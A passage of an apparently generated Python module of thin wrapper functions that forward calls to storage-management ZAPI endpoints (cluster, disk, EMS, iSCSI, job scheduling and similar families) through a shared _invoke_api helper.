    return _invoke_api('cluster-log-forward-get-iter', *args)
def cluster_log_forward_modify(*args):
    return _invoke_api('cluster-log-forward-modify', *args)
def cluster_log_forward_statistics_get(*args):
    return _invoke_api('cluster-log-forward-statistics-get', *args)
def cluster_log_forward_statistics_get_iter(*args):
    return _invoke_api('cluster-log-forward-statistics-get-iter', *args)
def cluster_node_get(*args):
    return _invoke_api('cluster-node-get', *args)
def cluster_node_get_iter(*args):
    return _invoke_api('cluster-node-get-iter', *args)
def cluster_node_modify(*args):
    return _invoke_api('cluster-node-modify', *args)
def cluster_peer_active_address_insert(*args):
    return _invoke_api('cluster-peer-active-address-insert', *args)
def cluster_peer_active_addresses_get(*args):
    return _invoke_api('cluster-peer-active-addresses-get', *args)
def cluster_peer_active_addresses_register(*args):
    return _invoke_api('cluster-peer-active-addresses-register', *args)
def cluster_peer_authn_offer_cancel(*args):
    return _invoke_api('cluster-peer-authn-offer-cancel', *args)
def cluster_peer_authn_offer_get(*args):
    return _invoke_api('cluster-peer-authn-offer-get', *args)
def cluster_peer_authn_offer_get_iter(*args):
    return _invoke_api('cluster-peer-authn-offer-get-iter', *args)
def cluster_peer_authn_offer_modify(*args):
    return _invoke_api('cluster-peer-authn-offer-modify', *args)
def cluster_peer_connection_destroy(*args):
    return _invoke_api('cluster-peer-connection-destroy', *args)
def cluster_peer_connections_get(*args):
    return _invoke_api('cluster-peer-connections-get', *args)
def cluster_peer_connections_get_iter(*args):
    return _invoke_api('cluster-peer-connections-get-iter', *args)
def cluster_peer_create(*args):
    return _invoke_api('cluster-peer-create', *args)
def cluster_peer_delete(*args):
    return _invoke_api('cluster-peer-delete', *args)
def cluster_peer_get(*args):
    return _invoke_api('cluster-peer-get', *args)
def cluster_peer_get_iter(*args):
    return _invoke_api('cluster-peer-get-iter', *args)
def cluster_peer_health_info_get(*args):
    return _invoke_api('cluster-peer-health-info-get', *args)
def cluster_peer_health_info_get_iter(*args):
    return _invoke_api('cluster-peer-health-info-get-iter', *args)
def cluster_peer_modify(*args):
    return _invoke_api('cluster-peer-modify', *args)
def cluster_peer_ping_cluster_peer_test_check_mtu(*args):
    return _invoke_api('cluster-peer-ping-cluster-peer-test-check-mtu', *args)
def cluster_peer_ping_iter(*args):
    return _invoke_api('cluster-peer-ping-iter', *args)
def cluster_peer_policy_get(*args):
    return _invoke_api('cluster-peer-policy-get', *args)
def cluster_peer_policy_modify(*args):
    return _invoke_api('cluster-peer-policy-modify', *args)
def cluster_peer_stable_addresses_get(*args):
    return _invoke_api('cluster-peer-stable-addresses-get', *args)
def cluster_peer_stable_addresses_register(*args):
    return _invoke_api('cluster-peer-stable-addresses-register', *args)
def cluster_unjoin(*args):
    return _invoke_api('cluster-unjoin', *args)
# Generated thin wrappers for the 'config-backup-*' API family; each forwards
# its positional arguments unchanged to _invoke_api.
def config_backup_copy(*args):
    return _invoke_api('config-backup-copy', *args)
def config_backup_create(*args):
    return _invoke_api('config-backup-create', *args)
def config_backup_delete(*args):
    return _invoke_api('config-backup-delete', *args)
def config_backup_download(*args):
    return _invoke_api('config-backup-download', *args)
def config_backup_info_get(*args):
    return _invoke_api('config-backup-info-get', *args)
def config_backup_info_get_iter(*args):
    return _invoke_api('config-backup-info-get-iter', *args)
def config_backup_rename(*args):
    return _invoke_api('config-backup-rename', *args)
def config_backup_settings_get(*args):
    return _invoke_api('config-backup-settings-get', *args)
def config_backup_settings_modify(*args):
    return _invoke_api('config-backup-settings-modify', *args)
def config_backup_settings_password_set(*args):
    return _invoke_api('config-backup-settings-password-set', *args)
def config_backup_upload(*args):
    return _invoke_api('config-backup-upload', *args)
# Generated thin wrappers for the 'core-segment-*', 'coredump-*', and
# 'cost-center-*' API families; each forwards its positional arguments
# unchanged to _invoke_api.
def core_segment_config_get(*args):
    return _invoke_api('core-segment-config-get', *args)
def core_segment_config_modify(*args):
    return _invoke_api('core-segment-config-modify', *args)
def core_segment_delete_all(*args):
    return _invoke_api('core-segment-delete-all', *args)
def core_segment_destroy(*args):
    return _invoke_api('core-segment-destroy', *args)
def core_segment_get(*args):
    return _invoke_api('core-segment-get', *args)
def core_segment_get_iter(*args):
    return _invoke_api('core-segment-get-iter', *args)
def core_segment_start(*args):
    return _invoke_api('core-segment-start', *args)
def core_segment_status_get_iter(*args):
    return _invoke_api('core-segment-status-get-iter', *args)
def core_segment_stop(*args):
    return _invoke_api('core-segment-stop', *args)
def coredump_config_get(*args):
    return _invoke_api('coredump-config-get', *args)
def coredump_config_get_iter(*args):
    return _invoke_api('coredump-config-get-iter', *args)
def coredump_config_get_total_records(*args):
    return _invoke_api('coredump-config-get-total-records', *args)
def coredump_config_modify(*args):
    return _invoke_api('coredump-config-modify', *args)
def coredump_config_modify_iter(*args):
    return _invoke_api('coredump-config-modify-iter', *args)
def coredump_delete_all(*args):
    return _invoke_api('coredump-delete-all', *args)
def coredump_delete_core(*args):
    return _invoke_api('coredump-delete-core', *args)
def coredump_delete_core_iter(*args):
    return _invoke_api('coredump-delete-core-iter', *args)
def coredump_get(*args):
    return _invoke_api('coredump-get', *args)
def coredump_get_iter(*args):
    return _invoke_api('coredump-get-iter', *args)
def coredump_get_total_records(*args):
    return _invoke_api('coredump-get-total-records', *args)
def coredump_save_all(*args):
    return _invoke_api('coredump-save-all', *args)
def coredump_save_core(*args):
    return _invoke_api('coredump-save-core', *args)
def coredump_save_core_iter(*args):
    return _invoke_api('coredump-save-core-iter', *args)
def coredump_trigger(*args):
    return _invoke_api('coredump-trigger', *args)
def coredump_upload_core(*args):
    return _invoke_api('coredump-upload-core', *args)
def cost_center_statistics_get(*args):
    return _invoke_api('cost-center-statistics-get', *args)
def cost_center_statistics_get_iter(*args):
    return _invoke_api('cost-center-statistics-get-iter', *args)
def cost_center_statistics_get_total_records(*args):
    return _invoke_api('cost-center-statistics-get-total-records', *args)
# Generated thin wrappers for the 'dashboard-*' and 'default-*' API families;
# each forwards its positional arguments unchanged to _invoke_api.
def dashboard_alarm_get(*args):
    return _invoke_api('dashboard-alarm-get', *args)
def dashboard_alarm_get_iter(*args):
    return _invoke_api('dashboard-alarm-get-iter', *args)
def dashboard_alarm_get_total_records(*args):
    return _invoke_api('dashboard-alarm-get-total-records', *args)
def dashboard_alarm_threshold_get(*args):
    return _invoke_api('dashboard-alarm-threshold-get', *args)
def dashboard_alarm_threshold_get_iter(*args):
    return _invoke_api('dashboard-alarm-threshold-get-iter', *args)
def dashboard_alarm_threshold_get_total_records(*args):
    return _invoke_api('dashboard-alarm-threshold-get-total-records', *args)
def dashboard_alarm_threshold_modify(*args):
    return _invoke_api('dashboard-alarm-threshold-modify', *args)
def default_destroy_iter(*args):
    return _invoke_api('default-destroy-iter', *args)
def default_destroy_iter_inout(*args):
    return _invoke_api('default-destroy-iter-inout', *args)
def default_get(*args):
    return _invoke_api('default-get', *args)
def default_get_inout(*args):
    return _invoke_api('default-get-inout', *args)
def default_get_iter(*args):
    return _invoke_api('default-get-iter', *args)
def default_get_iter_inout(*args):
    return _invoke_api('default-get-iter-inout', *args)
def default_modify_iter(*args):
    return _invoke_api('default-modify-iter', *args)
def default_modify_iter_inout(*args):
    return _invoke_api('default-modify-iter-inout', *args)
# Generated thin wrappers for the 'diagnosis-*' API family; each forwards its
# positional arguments unchanged to _invoke_api.
def diagnosis_alert_definition_get(*args):
    return _invoke_api('diagnosis-alert-definition-get', *args)
def diagnosis_alert_definition_get_iter(*args):
    return _invoke_api('diagnosis-alert-definition-get-iter', *args)
def diagnosis_alert_get(*args):
    return _invoke_api('diagnosis-alert-get', *args)
def diagnosis_alert_get_iter(*args):
    return _invoke_api('diagnosis-alert-get-iter', *args)
def diagnosis_alert_modify(*args):
    return _invoke_api('diagnosis-alert-modify', *args)
def diagnosis_config_get(*args):
    return _invoke_api('diagnosis-config-get', *args)
def diagnosis_config_get_iter(*args):
    return _invoke_api('diagnosis-config-get-iter', *args)
def diagnosis_delete_alert(*args):
    return _invoke_api('diagnosis-delete-alert', *args)
def diagnosis_policy_definition_get(*args):
    return _invoke_api('diagnosis-policy-definition-get', *args)
def diagnosis_policy_definition_get_iter(*args):
    return _invoke_api('diagnosis-policy-definition-get-iter', *args)
def diagnosis_policy_modify(*args):
    return _invoke_api('diagnosis-policy-modify', *args)
def diagnosis_status_get(*args):
    return _invoke_api('diagnosis-status-get', *args)
def diagnosis_subscriptions_create(*args):
    return _invoke_api('diagnosis-subscriptions-create', *args)
def diagnosis_subscriptions_get(*args):
    return _invoke_api('diagnosis-subscriptions-get', *args)
def diagnosis_subscriptions_get_iter(*args):
    return _invoke_api('diagnosis-subscriptions-get-iter', *args)
def diagnosis_subscriptions_modify(*args):
    return _invoke_api('diagnosis-subscriptions-modify', *args)
def diagnosis_subsystem_config_get(*args):
    return _invoke_api('diagnosis-subsystem-config-get', *args)
def diagnosis_subsystem_config_get_iter(*args):
    return _invoke_api('diagnosis-subsystem-config-get-iter', *args)
def diagnosis_subsystem_config_modify(*args):
    return _invoke_api('diagnosis-subsystem-config-modify', *args)
# Generated thin wrappers for the 'disk-*' API family; each forwards its
# positional arguments unchanged to _invoke_api.
def disk_encrypt_get(*args):
    return _invoke_api('disk-encrypt-get', *args)
def disk_encrypt_get_iter(*args):
    return _invoke_api('disk-encrypt-get-iter', *args)
def disk_encrypt_modify(*args):
    return _invoke_api('disk-encrypt-modify', *args)
def disk_encrypt_modify_iter(*args):
    return _invoke_api('disk-encrypt-modify-iter', *args)
def disk_encrypt_sanitize(*args):
    return _invoke_api('disk-encrypt-sanitize', *args)
def disk_encrypt_sanitize_iter(*args):
    return _invoke_api('disk-encrypt-sanitize-iter', *args)
def disk_encrypt_status_get(*args):
    return _invoke_api('disk-encrypt-status-get', *args)
def disk_encrypt_status_get_iter(*args):
    return _invoke_api('disk-encrypt-status-get-iter', *args)
def disk_fail(*args):
    return _invoke_api('disk-fail', *args)
def disk_remove(*args):
    return _invoke_api('disk-remove', *args)
def disk_sanown_assign(*args):
    return _invoke_api('disk-sanown-assign', *args)
def disk_sanown_filer_list_info(*args):
    return _invoke_api('disk-sanown-filer-list-info', *args)
def disk_sanown_list_info(*args):
    return _invoke_api('disk-sanown-list-info', *args)
def disk_sanown_reassign(*args):
    return _invoke_api('disk-sanown-reassign', *args)
def disk_sanown_remove_ownership(*args):
    return _invoke_api('disk-sanown-remove-ownership', *args)
def disk_unfail(*args):
    return _invoke_api('disk-unfail', *args)
def disk_update_disk_fw(*args):
    return _invoke_api('disk-update-disk-fw', *args)
def disk_zero_spares(*args):
    return _invoke_api('disk-zero-spares', *args)
# Dummy-family ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def dummy_addquery_alt_get(*args):
    return _invoke_api('dummy-addquery-alt-get', *args)
def dummy_addquery_create(*args):
    return _invoke_api('dummy-addquery-create', *args)
def dummy_addquery_get_iter(*args):
    return _invoke_api('dummy-addquery-get-iter', *args)
def dummy_addquery_modify(*args):
    return _invoke_api('dummy-addquery-modify', *args)
def dummy_async_volume_create(*args):
    return _invoke_api('dummy-async-volume-create', *args)
def dummy_async_volume_create_args(*args):
    return _invoke_api('dummy-async-volume-create-args', *args)
def dummy_av_get_engine_options(*args):
    return _invoke_api('dummy-av-get-engine-options', *args)
def dummy_av_set_engine_options(*args):
    return _invoke_api('dummy-av-set-engine-options', *args)
def dummy_fcp_create(*args):
    return _invoke_api('dummy-fcp-create', *args)
def dummy_fcp_destroy(*args):
    return _invoke_api('dummy-fcp-destroy', *args)
def dummy_fcp_get_iter(*args):
    return _invoke_api('dummy-fcp-get-iter', *args)
def dummy_file_dummy_read_file(*args):
    return _invoke_api('dummy-file-dummy-read-file', *args)
def dummy_listInfo_only_get(*args):
    return _invoke_api('dummy-listInfo-only-get', *args)
def dummy_listInfo_only_list_info(*args):
    return _invoke_api('dummy-listInfo-only-list-info', *args)
def dummy_quota_create(*args):
    return _invoke_api('dummy-quota-create', *args)
def dummy_quota_destroy(*args):
    return _invoke_api('dummy-quota-destroy', *args)
def dummy_quota_report(*args):
    return _invoke_api('dummy-quota-report', *args)
def dummy_quota_report_no_input(*args):
    return _invoke_api('dummy-quota-report-no-input', *args)
def dummy_storage_initiator_errors_list_info(*args):
    return _invoke_api('dummy-storage-initiator-errors-list-info', *args)
def dummy_storage_initiator_errors_list_info_alt(*args):
    return _invoke_api('dummy-storage-initiator-errors-list-info-alt', *args)
def dummy_storage_initiator_errors_list_info_empty(*args):
    return _invoke_api('dummy-storage-initiator-errors-list-info-empty', *args)
def dummy_vserver_destroy_iter(*args):
    return _invoke_api('dummy-vserver-destroy-iter', *args)
def dummy_vserver_dosomething(*args):
    return _invoke_api('dummy-vserver-dosomething', *args)
def dummy_vserver_family_test_alt_create(*args):
    return _invoke_api('dummy-vserver-family-test-alt-create', *args)
def dummy_vserver_family_test_alt_destroy(*args):
    return _invoke_api('dummy-vserver-family-test-alt-destroy', *args)
def dummy_vserver_family_test_alt_get(*args):
    return _invoke_api('dummy-vserver-family-test-alt-get', *args)
def dummy_vserver_family_test_alt_list_info(*args):
    return _invoke_api('dummy-vserver-family-test-alt-list-info', *args)
def dummy_vserver_family_test_alt_modify(*args):
    return _invoke_api('dummy-vserver-family-test-alt-modify', *args)
def dummy_vserver_family_test_destroy_iter(*args):
    return _invoke_api('dummy-vserver-family-test-destroy-iter', *args)
def dummy_vserver_family_test_get_iter(*args):
    return _invoke_api('dummy-vserver-family-test-get-iter', *args)
def dummy_vserver_family_test_list_info(*args):
    return _invoke_api('dummy-vserver-family-test-list-info', *args)
def dummy_vserver_family_test_modify_iter(*args):
    return _invoke_api('dummy-vserver-family-test-modify-iter', *args)
def dummy_vserver_fcp_list_get_iter(*args):
    return _invoke_api('dummy-vserver-fcp-list-get-iter', *args)
def dummy_vserver_file_dummy_vserver_read_file_alt(*args):
    return _invoke_api('dummy-vserver-file-dummy-vserver-read-file-alt', *args)
def dummy_vserver_get_iter(*args):
    return _invoke_api('dummy-vserver-get-iter', *args)
def dummy_vserver_list_info(*args):
    return _invoke_api('dummy-vserver-list-info', *args)
def dummy_vserver_list_info_1_alt(*args):
    return _invoke_api('dummy-vserver-list-info-1-alt', *args)
def dummy_vserver_list_info_2_alt(*args):
    return _invoke_api('dummy-vserver-list-info-2-alt', *args)
def dummy_vserver_list_info_3_alt(*args):
    return _invoke_api('dummy-vserver-list-info-3-alt', *args)
def dummy_vserver_list_info_alt(*args):
    return _invoke_api('dummy-vserver-list-info-alt', *args)
def dummy_vserver_modify_iter(*args):
    return _invoke_api('dummy-vserver-modify-iter', *args)
def dummy_zapi_delete_async(*args):
    return _invoke_api('dummy-zapi-delete-async', *args)
def dummy_zapi_delete_async_nowait(*args):
    return _invoke_api('dummy-zapi-delete-async-nowait', *args)
def dummy_zapi_delete_async_nowait_returnsok(*args):
    return _invoke_api('dummy-zapi-delete-async-nowait-returnsok', *args)
def dummy_zapi_jobid_async(*args):
    return _invoke_api('dummy-zapi-jobid-async', *args)
def dummy_zapi_jobid_async_nowait(*args):
    return _invoke_api('dummy-zapi-jobid-async-nowait', *args)
def dummy_zapi_key_attribute_specified_type(*args):
    return _invoke_api('dummy-zapi-key-attribute-specified-type', *args)
# Dummylun-family ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def dummylun_create(*args):
    return _invoke_api('dummylun-create', *args)
def dummylun_create_by_size(*args):
    return _invoke_api('dummylun-create-by-size', *args)
def dummylun_create_by_size_alt(*args):
    return _invoke_api('dummylun-create-by-size-alt', *args)
def dummylun_destroy_iter(*args):
    return _invoke_api('dummylun-destroy-iter', *args)
def dummylun_get_alt(*args):
    return _invoke_api('dummylun-get-alt', *args)
def dummylun_get_iter(*args):
    return _invoke_api('dummylun-get-iter', *args)
def dummylun_get_iter_alt(*args):
    return _invoke_api('dummylun-get-iter-alt', *args)
def dummylun_list_info(*args):
    return _invoke_api('dummylun-list-info', *args)
def dummylun_list_info_alt(*args):
    return _invoke_api('dummylun-list-info-alt', *args)
def dummylun_list_info_alt1(*args):
    return _invoke_api('dummylun-list-info-alt1', *args)
def dummylun_list_info_alt2(*args):
    return _invoke_api('dummylun-list-info-alt2', *args)
# EMS-family ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def ems_config_get(*args):
    return _invoke_api('ems-config-get', *args)
def ems_config_modify(*args):
    return _invoke_api('ems-config-modify', *args)
def ems_destination_create(*args):
    return _invoke_api('ems-destination-create', *args)
def ems_destination_destroy(*args):
    return _invoke_api('ems-destination-destroy', *args)
def ems_destination_destroy_iter(*args):
    return _invoke_api('ems-destination-destroy-iter', *args)
def ems_destination_get(*args):
    return _invoke_api('ems-destination-get', *args)
def ems_destination_get_iter(*args):
    return _invoke_api('ems-destination-get-iter', *args)
def ems_destination_modify(*args):
    return _invoke_api('ems-destination-modify', *args)
def ems_destination_modify_iter(*args):
    return _invoke_api('ems-destination-modify-iter', *args)
def ems_mail_history_destroy(*args):
    return _invoke_api('ems-mail-history-destroy', *args)
def ems_mail_history_destroy_iter(*args):
    return _invoke_api('ems-mail-history-destroy-iter', *args)
def ems_mail_history_get(*args):
    return _invoke_api('ems-mail-history-get', *args)
def ems_mail_history_get_iter(*args):
    return _invoke_api('ems-mail-history-get-iter', *args)
def ems_message_get(*args):
    return _invoke_api('ems-message-get', *args)
def ems_message_get_iter(*args):
    return _invoke_api('ems-message-get-iter', *args)
def ems_routing_add_destination(*args):
    return _invoke_api('ems-routing-add-destination', *args)
def ems_routing_get(*args):
    return _invoke_api('ems-routing-get', *args)
def ems_routing_get_iter(*args):
    return _invoke_api('ems-routing-get-iter', *args)
def ems_routing_modify(*args):
    return _invoke_api('ems-routing-modify', *args)
def ems_routing_modify_iter(*args):
    return _invoke_api('ems-routing-modify-iter', *args)
def ems_routing_remove_destination(*args):
    return _invoke_api('ems-routing-remove-destination', *args)
def ems_snmp_history_destroy(*args):
    return _invoke_api('ems-snmp-history-destroy', *args)
def ems_snmp_history_destroy_iter(*args):
    return _invoke_api('ems-snmp-history-destroy-iter', *args)
def ems_snmp_history_get(*args):
    return _invoke_api('ems-snmp-history-get', *args)
def ems_snmp_history_get_iter(*args):
    return _invoke_api('ems-snmp-history-get-iter', *args)
def ems_status_get(*args):
    return _invoke_api('ems-status-get', *args)
def ems_status_get_iter(*args):
    return _invoke_api('ems-status-get-iter', *args)
# Environment/event/export/external-cache ZAPI wrappers: each forwards *args
# straight to _invoke_api with the hyphenated API name and returns the result.
def environment_sensors_get_iter(*args):
    return _invoke_api('environment-sensors-get-iter', *args)
def event_log_get_iter(*args):
    return _invoke_api('event-log-get-iter', *args)
def export_policy_get_iter(*args):
    return _invoke_api('export-policy-get-iter', *args)
def export_rule_get_create_defaults(*args):
    return _invoke_api('export-rule-get-create-defaults', *args)
def export_rule_get_iter(*args):
    return _invoke_api('export-rule-get-iter', *args)
def exports_access_cache_all_vservers_get(*args):
    return _invoke_api('exports-access-cache-all-vservers-get', *args)
def exports_access_cache_all_vservers_modify(*args):
    return _invoke_api('exports-access-cache-all-vservers-modify', *args)
def external_cache_policy_get(*args):
    return _invoke_api('external-cache-policy-get', *args)
def external_cache_policy_get_iter(*args):
    return _invoke_api('external-cache-policy-get-iter', *args)
def external_cache_policy_modify(*args):
    return _invoke_api('external-cache-policy-modify', *args)
def external_cache_policy_modify_iter(*args):
    return _invoke_api('external-cache-policy-modify-iter', *args)
# FC/FCP/feature ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def fc_config_adapter_disable(*args):
    return _invoke_api('fc-config-adapter-disable', *args)
def fc_config_adapter_enable(*args):
    return _invoke_api('fc-config-adapter-enable', *args)
def fc_config_list_info(*args):
    return _invoke_api('fc-config-list-info', *args)
def fc_config_set_adapter_fc_type(*args):
    return _invoke_api('fc-config-set-adapter-fc-type', *args)
def fcp_adapter_config_down(*args):
    return _invoke_api('fcp-adapter-config-down', *args)
def fcp_adapter_config_up(*args):
    return _invoke_api('fcp-adapter-config-up', *args)
def fcp_adapter_get_iter(*args):
    return _invoke_api('fcp-adapter-get-iter', *args)
def fcp_adapter_set_speed(*args):
    return _invoke_api('fcp-adapter-set-speed', *args)
def fcp_adapter_stats_get_iter(*args):
    return _invoke_api('fcp-adapter-stats-get-iter', *args)
def fcp_initiator_get_iter(*args):
    return _invoke_api('fcp-initiator-get-iter', *args)
def fcp_interface_get_iter(*args):
    return _invoke_api('fcp-interface-get-iter', *args)
def fcp_port_name_get_iter(*args):
    return _invoke_api('fcp-port-name-get-iter', *args)
def fcp_service_get_iter(*args):
    return _invoke_api('fcp-service-get-iter', *args)
def fcp_wwpnalias_get_iter(*args):
    return _invoke_api('fcp-wwpnalias-get-iter', *args)
def fcport_get_link_state(*args):
    return _invoke_api('fcport-get-link-state', *args)
def feature_status_list_info(*args):
    return _invoke_api('feature-status-list-info', *args)
def feature_usage_get_iter(*args):
    return _invoke_api('feature-usage-get-iter', *args)
def feature_usage_summary_get_iter(*args):
    return _invoke_api('feature-usage-summary-get-iter', *args)
# File/fileservice/flash ZAPI wrappers: each forwards *args straight to
# _invoke_api with the hyphenated API name and returns the raw API result.
def file_assign_qos(*args):
    return _invoke_api('file-assign-qos', *args)
def file_copy_destroy(*args):
    return _invoke_api('file-copy-destroy', *args)
def file_copy_get_iter(*args):
    return _invoke_api('file-copy-get-iter', *args)
def file_copy_start(*args):
    return _invoke_api('file-copy-start', *args)
def file_directory_security_ntfs_dacl_get_iter(*args):
    return _invoke_api('file-directory-security-ntfs-dacl-get-iter', *args)
def file_directory_security_ntfs_get_iter(*args):
    return _invoke_api('file-directory-security-ntfs-get-iter', *args)
def file_directory_security_ntfs_sacl_get_iter(*args):
    return _invoke_api('file-directory-security-ntfs-sacl-get-iter', *args)
def file_directory_security_policy_get_iter(*args):
    return _invoke_api('file-directory-security-policy-get-iter', *args)
def file_directory_security_policy_task_get_iter(*args):
    return _invoke_api('file-directory-security-policy-task-get-iter', *args)
def file_move_destroy(*args):
    return _invoke_api('file-move-destroy', *args)
def file_move_get_iter(*args):
    return _invoke_api('file-move-get-iter', *args)
def file_move_start(*args):
    return _invoke_api('file-move-start', *args)
def fileservice_audit_config_get_iter(*args):
    return _invoke_api('fileservice-audit-config-get-iter', *args)
def fileservice_audit_config_get_total_records(*args):
    return _invoke_api('fileservice-audit-config-get-total-records', *args)
def flash_device_get_iter(*args):
    return _invoke_api('flash-device-get-iter', *args)
def flash_device_list_info(*args):
    return _invoke_api('flash-device-list-info', *args)
def flash_get_thresholds(*args):
    return _invoke_api('flash-get-thresholds', *args)
def flash_thresholds_get_iter(*args):
    return _invoke_api('flash-thresholds-get-iter', *args)
# Flexcache/fpolicy/GPO/group-mapping ZAPI wrappers: each forwards *args
# straight to _invoke_api with the hyphenated API name and returns the result.
def flexcache_cache_policy_create(*args):
    return _invoke_api('flexcache-cache-policy-create', *args)
def flexcache_cache_policy_destroy(*args):
    return _invoke_api('flexcache-cache-policy-destroy', *args)
def flexcache_cache_policy_get(*args):
    return _invoke_api('flexcache-cache-policy-get', *args)
def flexcache_cache_policy_get_iter(*args):
    return _invoke_api('flexcache-cache-policy-get-iter', *args)
def flexcache_cache_policy_modify(*args):
    return _invoke_api('flexcache-cache-policy-modify', *args)
def flexcache_create(*args):
    return _invoke_api('flexcache-create', *args)
def flexcache_delete(*args):
    return _invoke_api('flexcache-delete', *args)
def flexcache_get_iter(*args):
    return _invoke_api('flexcache-get-iter', *args)
def fpolicy_passthrough_read_connection_get_iter(*args):
    return _invoke_api('fpolicy-passthrough-read-connection-get-iter', *args)
def fpolicy_policy_event_get_iter(*args):
    return _invoke_api('fpolicy-policy-event-get-iter', *args)
def fpolicy_policy_external_engine_get_iter(*args):
    return _invoke_api('fpolicy-policy-external-engine-get-iter', *args)
def fpolicy_policy_get_iter(*args):
    return _invoke_api('fpolicy-policy-get-iter', *args)
def fpolicy_policy_scope_get_iter(*args):
    return _invoke_api('fpolicy-policy-scope-get-iter', *args)
def fpolicy_policy_status_get_iter(*args):
    return _invoke_api('fpolicy-policy-status-get-iter', *args)
def fpolicy_server_status_get_iter(*args):
    return _invoke_api('fpolicy-server-status-get-iter', *args)
def gpo_applied_info_get_iter(*args):
    return _invoke_api('gpo-applied-info-get-iter', *args)
def gpo_get_iter(*args):
    return _invoke_api('gpo-get-iter', *args)
def gpo_gpresult_info_get_iter(*args):
    return _invoke_api('gpo-gpresult-info-get-iter', *args)
def gpo_restricted_group_applied_info_get_iter(*args):
    return _invoke_api('gpo-restricted-group-applied-info-get-iter', *args)
def gpo_restricted_group_defined_info_get_iter(*args):
    return _invoke_api('gpo-restricted-group-defined-info-get-iter', *args)
def group_mapping_get_iter(*args):
    return _invoke_api('group-mapping-get-iter', *args)
# Igroup/interim-license/iSCSI ZAPI wrappers: each forwards *args straight to
# _invoke_api with the hyphenated API name and returns the raw API result.
def igroup_disable_aix_support(*args):
    return _invoke_api('igroup-disable-aix-support', *args)
def igroup_get_iter(*args):
    return _invoke_api('igroup-get-iter', *args)
def igroup_os_type_list(*args):
    return _invoke_api('igroup-os-type-list', *args)
def interim_license_list_get(*args):
    return _invoke_api('interim-license-list-get', *args)
def interim_license_remove(*args):
    return _invoke_api('interim-license-remove', *args)
def interim_license_set(*args):
    return _invoke_api('interim-license-set', *args)
def iscsi_connection_get_iter(*args):
    return _invoke_api('iscsi-connection-get-iter', *args)
def iscsi_initiator_auth_get_iter(*args):
    return _invoke_api('iscsi-initiator-auth-get-iter', *args)
def iscsi_initiator_get_iter(*args):
    return _invoke_api('iscsi-initiator-get-iter', *args)
def iscsi_interface_accesslist_get_iter(*args):
    return _invoke_api('iscsi-interface-accesslist-get-iter', *args)
def iscsi_interface_get_iter(*args):
    return _invoke_api('iscsi-interface-get-iter', *args)
def iscsi_isns_get_iter(*args):
    return _invoke_api('iscsi-isns-get-iter', *args)
def iscsi_service_get_iter(*args):
    return _invoke_api('iscsi-service-get-iter', *args)
def iscsi_session_get_iter(*args):
    return _invoke_api('iscsi-session-get-iter', *args)
def iscsi_stats_get_iter(*args):
    return _invoke_api('iscsi-stats-get-iter', *args)
def iscsi_tpgroup_get_iter(*args):
    return _invoke_api('iscsi-tpgroup-get-iter', *args)
# Job-family ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def job_bad_erase(*args):
    return _invoke_api('job-bad-erase', *args)
def job_bad_get_iter(*args):
    return _invoke_api('job-bad-get-iter', *args)
def job_by_node_get_iter(*args):
    return _invoke_api('job-by-node-get-iter', *args)
def job_completed_get_iter(*args):
    return _invoke_api('job-completed-get-iter', *args)
def job_delete_iter(*args):
    return _invoke_api('job-delete-iter', *args)
def job_expunge_iter(*args):
    return _invoke_api('job-expunge-iter', *args)
def job_get_iter(*args):
    return _invoke_api('job-get-iter', *args)
def job_history_get_iter(*args):
    return _invoke_api('job-history-get-iter', *args)
def job_init_state_get(*args):
    return _invoke_api('job-init-state-get', *args)
def job_init_state_get_iter(*args):
    return _invoke_api('job-init-state-get-iter', *args)
def job_kick(*args):
    return _invoke_api('job-kick', *args)
def job_pause_iter(*args):
    return _invoke_api('job-pause-iter', *args)
def job_private_completed_get_iter(*args):
    return _invoke_api('job-private-completed-get-iter', *args)
def job_private_delete_iter(*args):
    return _invoke_api('job-private-delete-iter', *args)
def job_private_get_iter(*args):
    return _invoke_api('job-private-get-iter', *args)
def job_private_pause_iter(*args):
    return _invoke_api('job-private-pause-iter', *args)
def job_private_resume_iter(*args):
    return _invoke_api('job-private-resume-iter', *args)
def job_private_soft_pause_iter(*args):
    return _invoke_api('job-private-soft-pause-iter', *args)
def job_private_stop_iter(*args):
    return _invoke_api('job-private-stop-iter', *args)
def job_queue_get(*args):
    return _invoke_api('job-queue-get', *args)
def job_queue_get_iter(*args):
    return _invoke_api('job-queue-get-iter', *args)
def job_resume_iter(*args):
    return _invoke_api('job-resume-iter', *args)
def job_schedule_consumer_get(*args):
    return _invoke_api('job-schedule-consumer-get', *args)
def job_schedule_consumer_get_iter(*args):
    return _invoke_api('job-schedule-consumer-get-iter', *args)
def job_schedule_cron_create(*args):
    return _invoke_api('job-schedule-cron-create', *args)
def job_schedule_cron_destroy(*args):
    return _invoke_api('job-schedule-cron-destroy', *args)
def job_schedule_cron_destroy_iter(*args):
    return _invoke_api('job-schedule-cron-destroy-iter', *args)
def job_schedule_cron_get(*args):
    return _invoke_api('job-schedule-cron-get', *args)
def job_schedule_cron_get_iter(*args):
    return _invoke_api('job-schedule-cron-get-iter', *args)
def job_schedule_cron_modify(*args):
    return _invoke_api('job-schedule-cron-modify', *args)
def job_schedule_get(*args):
    return _invoke_api('job-schedule-get', *args)
def job_schedule_get_iter(*args):
    return _invoke_api('job-schedule-get-iter', *args)
def job_schedule_interval_create(*args):
    return _invoke_api('job-schedule-interval-create', *args)
def job_schedule_interval_destroy(*args):
    return _invoke_api('job-schedule-interval-destroy', *args)
def job_schedule_interval_destroy_iter(*args):
    return _invoke_api('job-schedule-interval-destroy-iter', *args)
def job_schedule_interval_get(*args):
    return _invoke_api('job-schedule-interval-get', *args)
def job_schedule_interval_get_iter(*args):
    return _invoke_api('job-schedule-interval-get-iter', *args)
def job_schedule_interval_modify(*args):
    return _invoke_api('job-schedule-interval-modify', *args)
def job_soft_pause_iter(*args):
    return _invoke_api('job-soft-pause-iter', *args)
def job_stop_iter(*args):
    return _invoke_api('job-stop-iter', *args)
def job_type_by_category_get(*args):
    return _invoke_api('job-type-by-category-get', *args)
def job_type_by_category_get_iter(*args):
    return _invoke_api('job-type-by-category-get-iter', *args)
def job_type_get(*args):
    return _invoke_api('job-type-get', *args)
def job_type_get_iter(*args):
    return _invoke_api('job-type-get-iter', *args)
